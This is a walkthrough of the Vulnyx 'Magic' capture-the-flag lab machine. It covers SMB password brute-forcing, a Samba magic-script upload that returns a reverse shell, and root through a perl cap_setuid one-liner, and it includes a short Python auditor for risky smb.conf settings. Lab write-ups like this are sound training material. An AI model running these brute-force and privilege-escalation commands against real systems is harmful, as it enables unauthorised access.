# Vulnyx-Magic Machine Walkthrough (WP)

By 城南花已开

## Information gathering

### Service scanning

An SMB service is open.

```
sudo arp-scan -l
[sudo] password for ctf:
Sorry, try again.
[sudo] password for ctf:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.140 08:00:27:46:e5:2e (Unknown)
192.168.60.254 00:50:56:fd:82:05 (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.961 seconds (130.55 hosts/sec). 4 responded
export ip=192.168.60.140
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Open ports, closed hearts.

[~] The config file is expected to be at "/home/ctf/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.140:22
Open 192.168.60.140:80
Open 192.168.60.140:139
Open 192.168.60.140:445
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-06 16:24 CST
Initiating ARP Ping Scan at 16:24
Scanning 192.168.60.140 [1 port]
Completed ARP Ping Scan at 16:24, 0.10s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:24
Completed Parallel DNS resolution of 1 host. at 16:24, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:24
Scanning 192.168.60.140 [4 ports]
Discovered open port 139/tcp on 192.168.60.140
Discovered open port 445/tcp on 192.168.60.140
Discovered open port 22/tcp on 192.168.60.140
Discovered open port 80/tcp on 192.168.60.140
Completed SYN Stealth Scan at 16:24, 0.03s elapsed (4 total ports)
Nmap scan report for 192.168.60.140
Host is up, received arp-response (0.00049s latency).
Scanned at 2025-01-06 16:24:54 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
139/tcp open netbios-ssn syn-ack ttl 64
445/tcp open microsoft-ds syn-ack ttl 64
MAC Address: 08:00:27:46:E5:2E (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
Raw packets sent: 5 (204B) | Rcvd: 5 (204B)
```

Visiting port 80 shows the default nginx page.

Let's scan for directories.

```
❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,zip,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.140
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/backup (Status: 301) [Size: 169] [--> http://192.168.60.140/backup/]
Progress: 23670 / 23675 (99.98%)
===============================================================
Finished
===============================================================
```

Only backup gives a 301 redirect; visiting it returns a 403, so no permission there.

Let's try scanning again under the backup directory.

### Fuzzing

Found conf, still a 403; I suspect there are more files under it.

```
❯ gobuster dir -u http://$ip/backup -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,zip,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.140/backup
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/conf (Status: 301) [Size: 169] [--> http://192.168.60.140/backup/conf/]
Progress: 18892 / 23675 (79.80%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 19321 / 23675 (81.61%)
===============================================================
Finished
===============================================================
```

Add an -x parameter to specify the file extensions.

```
❯ gobuster dir -u http://$ip/backup/conf -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,conf
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.140/backup/conf
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,conf
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/smb.conf (Status: 200) [Size: 8799]
Progress: 14202 / 14205 (99.98%)
===============================================================
Finished
===============================================================
```

This time it finally found something.

## SMB magic script

Opening the file, we find it is a Samba config that sets an SMB magic script.

For details, see the HackMyVM-crossroads walkthrough (WP) | Pepster’Blog.

The file reveals a user: xerosec.
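The directive that matters here is Samba's `magic script`: a file uploaded to the share under that name is executed by the server, as the connected user, when the client closes it, which is exactly what the later config.sh upload relies on. As an added defender-side example (not from the original post or from the Samba project), this Python audit parses an smb.conf and flags shares where a magic script is configured, rating it higher when the share is also writable; the sample configuration is constructed, not the file served by the box.

```python
# Constructed sample smb.conf shaped like the finding in the write-up
# (a writable share with a magic script set); not the file served by the box.
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
[tmp]
   path = /tmp
   Read Only = No
   magic script = config.sh
[public]
   path = /srv/public
   read only = yes
"""

YES = {"yes", "true", "1"}
NO = {"no", "false", "0"}

def parse_smb_conf(text):
    """Minimal smb.conf reader -> {section: {param: value}}. Samba ignores case
    and whitespace in parameter names, so 'Read Only' == 'readonly'; '#'/';' comment."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections[current] = {}
        elif "=" in line and current is not None:
            key, value = line.split("=", 1)
            sections[current][key.lower().replace(" ", "")] = value.strip()
    return sections

def share_is_writable(params):
    """True if writes are allowed: read only = no, or any write synonym = yes."""
    if params.get("readonly", "yes").lower() in NO:
        return True
    return any(params.get(k, "no").lower() in YES
               for k in ("writable", "writeable", "writeok"))

def audit_smb_conf(text):
    """Return [(share, severity, message)] for every share that runs a magic
    script. A 'magic script' set in [global] is inherited by all shares."""
    sections = parse_smb_conf(text)
    inherited = sections.get("global", {}).get("magicscript")
    findings = []
    for share, params in sections.items():
        script = params.get("magicscript", inherited)
        if share == "global" or not script:
            continue
        writable = share_is_writable(params)
        findings.append((share, "HIGH" if writable else "MEDIUM",
                         f"magic script = {script}" +
                         (" on a writable share" if writable else "")))
    return findings
```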


Let's try brute-forcing SMB with Medusa.

Clearly the password is 123456.

```
❯ medusa  -h 192.168.60.140 -u xerosec -P /usr/share/wordlists/rockyou.txt -M smbnt
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]>

ERROR: smbnt.mod: Unknown security mode request: 00. Proceeding using ENCRYPTED password mode.
ACCOUNT CHECK: [smbnt] Host: 192.168.60.140 (1 of 1, 0 complete) User: xerosec (1 of 1, 0 complete) Password: 123456 (1 of 14344391 complete)
ACCOUNT FOUND: [smbnt] Host: 192.168.60.140 User: xerosec Password: 123456 [ERROR (0xFFFFFF:UNKNOWN_ERROR_CODE)]
```

Connecting to SMB... hold on, something is off, why is it showing an unknown error code?

Can SMBv1 not be brute-forced?

### SMB brute force

I switched to netexec for the brute force.

Password Spraying | NetExec

```
❯ netexec smb 192.168.60.140 -u xerosec -p /usr/share/seclists/Passwords/richelieu-french-top5000.txt
SMB 192.168.60.140 445 MAGIC [+] MAGIC\xerosec:david1
```

Got the password very quickly.

Connect to SMB again.

```
❯ smbclient -U xerosec //$ip/tmp
Password for [WORKGROUP\xerosec]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon Jan 6 19:49:11 2025
.. D 0 Thu Jan 2 21:06:27 2025
.font-unix DH 0 Mon Jan 6 19:49:08 2025
.ICE-unix DH 0 Mon Jan 6 19:49:08 2025
.X11-unix DH 0 Mon Jan 6 19:49:08 2025
.XIM-unix DH 0 Mon Jan 6 19:49:08 2025
systemd-private-1c2ec0fc98bb47d59d82b7d86a17396c-systemd-logind.service-WyQhcg D 0 Mon Jan 6 19:49:09 2025

19480400 blocks of size 1024. 16510872 blocks available
smb: \> put
```

## User privilege escalation

Sure enough. So let's create the magic script config.sh.

The upload hangs the moment it goes up.

Just listen on a port on the other side.

```
❯ vim config.sh
❯ smbclient -U xerosec //$ip/tmp
Password for [WORKGROUP\xerosec]:
Try "help" to get a list of possible commands.
smb: \> put config.sh
----------- separator --------
❯ pwncat-cs -lp 4444
[20:35:50] Welcome to pwncat 🐈! __main__.py:164
[20:36:00] received connection from 192.168.60.140:46142 bind.py:84
[20:36:00] 192.168.60.140:46142: registered new host w/ db manager.py:957
(local) pwncat$
(remote) xerosec@magic:/tmp$ id
uid=1000(xerosec) gid=1000(xerosec) grupos=1000(xerosec)
(remote) xerosec@magic:/tmp$ cd ~
(remote) xerosec@magic:/home/xerosec$ ls
user.txt
(remote) xerosec@magic:/home/xerosec$ cat user.txt
d14885ecd144685ad228d66e275d715e
```

## Root privilege escalation

This user has sudo rights, but how on earth do you escalate with id?!

It can only print the user's uid, gid and so on; this is a trap.

Gather information again.

We can see that perl has the setuid capability.

```
(remote) xerosec@magic:/home/xerosec$ sudo -l
Matching Defaults entries for xerosec on magic:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User xerosec may run the following commands on magic:
(root) NOPASSWD: /usr/bin/id
(remote) xerosec@magic:/home/xerosec$ getcap -r /
/usr/bin/perl5.36.0 cap_setuid=ep
/usr/bin/ping cap_net_raw=ep
/usr/bin/perl cap_setuid=ep
```
Just use it directly, though I can't figure out why PS1 ends up with backslashes in it.


```
(remote) xerosec@magic:/home/xerosec$ perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
\[\](remote)\[\] \[\]root@magic\[\]:\[\]/home/xerosec\[\]$ id
uid=0(root) gid=1000(xerosec) grupos=1000(xerosec)
\[\](remote)\[\] \[\]root@magic\[\]:\[\]/home/xerosec\[\]$ cat /root/root.txt
8e90ffd47b5164f275c42955a2531eef
```